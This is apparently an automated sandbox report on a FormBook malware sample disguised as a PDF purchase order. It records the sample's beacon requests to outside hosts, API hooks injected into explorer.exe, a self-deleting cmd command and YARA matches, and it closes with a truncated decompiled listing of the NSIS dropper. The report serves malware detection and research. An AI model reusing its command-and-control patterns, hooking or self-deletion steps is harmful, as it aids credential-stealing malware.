Aug 22, 2023 13:44:02.814177990 CEST	24	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 22 Aug 2023 11:44:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 6d 61 69 6e 2d 37 38 38 34 34 33 35 30 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 53 65 6d 69 42 6f 6c 64 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 50 61 67 65 5f 32 30 32 33 2d 72 6f 6f 74 5f 32 64 70 75 73 20 22 3e 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 72 6f 6f 74 5f 31 41 47 79 31 20 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 72 6f 6f 74 5f 71 68 4d 51 32 22 3e 3c 64 69 76 3e 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 65 78 74 5f 33 37 6e 71 4f 20 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 74 65 78 74 5f 31 4a 5a 79 73 22 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>thirdmind.network</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=thirdmind.network"><strong>View the WHOIS results
Aug 22, 2023 13:44:02.814225912 CEST	25	IN	Data Raw: 20 6f 66 20 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72 Data Ascii: of thirdmind.network</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span class="Parkin
Aug 22, 2023 13:44:02.814245939 CEST	25	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.9	49716	34.149.87.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:44:28.778609037 CEST	26	OUT	GET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1 Host: www.thewhiteorchidspa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:44:28.919048071 CEST	27	IN	HTTP/1.1 301 Moved Permanently Content-Length: 0 Location: https://www.thewhiteorchidspa.com/sn26?kJBLpb8=pgVZ8pYUx%2Fmb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1692704668.8142199527221550 Age: 0 Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Accept-Ranges: bytes Date: Tue, 22 Aug 2023 11:44:28 GMT X-Served-By: cache-lin2290021-LIN X-Cache: MISS Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIK30U7RbSHN8wnIjYHleQHv,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRali1CcZkbfiT1SWjM/tkAtQiFM/lIMQPSgLvcrzB3pdCuxmHv8JmZfQswK4rISLAEpDPlAX9aDyZtbYPVeMeJwl0=,2UNV7KOq4oGjA5+PKsX47PpAuGwGFDWggbLa+hP4SSpWd3xniMsr1HjrszKGvMzr,mItJhVIV+SAqRuhTJgrT3ivxECPgOA7K/yeqqYiUWBg=,QR6LYlxR64IEv6P3lj/fyGr8XOCa52uZdB4PYU0IZ0g=,YobcUJuAWHc9YoUVfe+pzAgFKtWLY0Gl8zD7GB0L7jUHg6lQbHmlQg7mpprLwux1wxiyk/N2PvO2GMIYvPcR0A== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.9	49733	107.148.25.122	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:45:13.541361094 CEST	2776	OUT	GET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1 Host: www.uahrbqtj.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:45:13.708733082 CEST	2776	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 22 Aug 2023 11:45:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEF
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEF
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEF
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEF

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO-230821_pdf.exePID: 7080, Parent PID: 4376

General

Target ID:	0
Start time:	13:41:21
Start date:	22/08/2023
Path:	C:\Users\user\Desktop\PO-230821_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO-230821_pdf.exe
Imagebase:	0x400000
File size:	260'228 bytes
MD5 hash:	AC43233DD5FE6D55C112660DC700E564
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: PO-230821_pdf.exePID: 7148, Parent PID: 7080

General

Target ID:	2
Start time:	13:41:22
Start date:	22/08/2023
Path:	C:\Users\user\Desktop\PO-230821_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO-230821_pdf.exe
Imagebase:	0x400000
File size:	260'228 bytes
MD5 hash:	AC43233DD5FE6D55C112660DC700E564
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4376, Parent PID: 7148

General

Target ID:	3
Start time:	13:41:26
Start date:	22/08/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69ce30000
File size:	4'704'752 bytes
MD5 hash:	EEC7F02FBAE12687726D441FFADC051D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: autofmt.exePID: 6204, Parent PID: 4376

General

Target ID:	4
Start time:	13:41:31
Start date:	22/08/2023
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0x4e0000
File size:	824'320 bytes
MD5 hash:	A5202257A05BB4D3773A2717317C2D95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 6216, Parent PID: 4376

General

Target ID:	5
Start time:	13:41:31
Start date:	22/08/2023
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xd10000
File size:	148'992 bytes
MD5 hash:	4DBD69D4C9DA5AAAC731F518EF8EBEA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6268, Parent PID: 6216

General

Target ID:	6
Start time:	13:41:35
Start date:	22/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\PO-230821_pdf.exe"
Imagebase:	0x770000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6296, Parent PID: 6268

General

Target ID:	7
Start time:	13:41:36
Start date:	22/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff69d510000
File size:	843'264 bytes
MD5 hash:	CE1A079265E7A92863BAAD92DE538D72
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: PO-230821_pdf.exePID: 7080, Parent PID: 4376COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	7.1%
Signature Coverage:	11.3%
Total number of Nodes:	1446
Total number of Limit Nodes:	37

Executed Functions

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"" - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"", _t189);
											if(_t219 < L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Alvin\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Alvin\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Alvin\\AppData\\Local\\Temp"; // 0x43
